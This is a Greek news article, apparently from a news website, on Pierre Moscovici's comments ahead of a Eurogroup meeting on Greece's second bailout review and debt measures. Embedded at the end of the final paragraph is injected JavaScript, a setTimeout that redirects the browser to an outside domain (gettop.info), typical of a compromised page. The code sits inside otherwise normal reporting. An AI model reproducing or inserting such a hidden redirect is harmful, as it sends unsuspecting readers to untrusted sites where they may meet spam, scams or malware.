Μοσκοβισί: Σημαντικό βήμα η επόμενη συνεδρίαση του Eurogroup

0
12

 

Την άποψη ότι πρέπει να συνεχιστεί η εργασία για μια συμφωνία σε τεχνικό επίπεδο έως το Eurogroup της 5ης Δεκεμβρίου, εξέφρασε ο Επίτροπος Οικονομικών υποθέσεων, Πιερ Μοσκοβισί.

Ο κ. Μοσκοβισί τόνισε ωστόσο ότι αν και δεν θα αποτελέσει την «καταληκτική» συνεδρίαση, θα είναι ένα «σημαντικό βήμα».

«Είμαι πεπεισμένος ότι θα είναι μια σημαντική και θετική συνεδρίαση για την Ελλάδα» είπε ο επίτροπος Οικονομικών και υπογράμμισε ότι «πρέπει να συνεχιστεί η δουλειά μέχρι την τελευταία στιγμή για την επίτευξη μιας συμφωνίας σε τεχνικό επίπεδο». Με αυτόν τον τρόπο θα μπορέσει το Eurogroup να προχωρήσει σε μια «σοβαρή» συζήτηση για την πορεία της δεύτερης αξιολόγησης, αλλά και σε μια «εποικοδομητική» συζήτηση για τα μέτρα «αναδιάρθρωσης του χρέους», συμπεριλαμβανομένων των βραχυπρόθεσμων μέτρων και ενός «σχεδίου για τα μεσοπρόθεσμα» που αφορούν την περίοδο μετά το τέλος του προγράμματος. Οι συζητήσεις συνεχίζονται και υπάρχει μεγαλύτερη σύγκλιση απόψεων» ανέφερε ο ίδιος, υπογραμμίζοντας ωστόσο πως «απομένει ακόμα δουλειά να γίνει».

Ο Γάλλος επίτροπος αναφέρθηκε σε μια «δυναμική επιτυχίας» που υπάρχει αυτή τη στιγμή γύρω από την Ελλάδα, η οποία είναι εμφανής στη βελτίωση των οικονομικών στοιχείων για το τρίτο τρίμηνο.

Επίσης σημείωσε «δεν έχουμε ακόμα φτάσει στο τέλος του δρόμου». Ο Π. Μοσκοβισί κάλεσε «όλες τις ενδιαφερόμενες πλευρές να συνεχίσουν να εργάζονται τις επόμενες ώρες και μέρες πριν το Eurogroup» έτσι ώστε να προχωρήσει η συμφωνία σε τεχνικό επίπεδο, εκφράζοντας την πεποίθηση ότι σε κάθε περίπτωση τη Δευτέρα θα γίνει μια «εποικοδομητική» συζήτηση για την Ελλάδα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here